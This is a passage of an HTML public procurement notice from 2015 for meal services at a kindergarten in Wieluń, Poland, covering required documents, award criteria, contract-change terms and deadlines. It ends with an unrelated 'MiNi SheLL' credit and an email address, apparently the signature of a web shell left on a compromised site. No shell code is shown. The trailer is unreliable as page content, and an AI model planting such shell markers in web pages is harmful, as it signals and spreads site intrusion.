<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - termin płatności faktur - 10</li>
<li>3 - przygotowywanie posiłku w placówce - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z art. 144 ust. 1 ustawy Pzp przewiduje się możliwość dokonania niżej wymienionych zmian: 1) ceny jednostkowe ryczałtowe brutto posiłków mogą ulec zmianie w przypadku ustawowej zmiany stawki podatku VAT; 2) strony dopuszczają możliwość zmiany ceny posiłków raz w roku, na wniosek Wykonawcy, złożony na przełomie miesięcy lipca i sierpnia, o sumę wskaźników cen towarów i usług konsumpcyjnych za III i IV kwartał roku poprzedzającego i I i II kwartał roku bieżącego - na podstawie komunikatu Prezesa GUS; 3) zmiany w jadłospisie za zgodą Zamawiającego. 2. Nie jest dopuszczalna zmiana Wykonawcy za wyjątkiem sukcesji generalnej, w tym dziedziczenia prawa w spółkach handlowych, przekształcenia, sukcesji z mocy prawa. 3. Zmiana postanowień umowy może nastąpić za zgodą obu stron wyrażona na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany. Zmiany nie mogą naruszać postanowień zawartych w art. 144 ust. 1 Prawa zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip-przedszk1.um.wielun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Publiczne Przedszkole Nr 1 w Wieluniu , ul. Wodna 4, 98-300 Wieluń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.06.2015 godzina 13:00, miejsce: Gmina Wieluń, 98-300 Wieluń, Plac Kazimierza Wielkiego 1, pokój nr 1 Wydział Organizacyjny (budynek Ratusza).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 18.07.2015.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com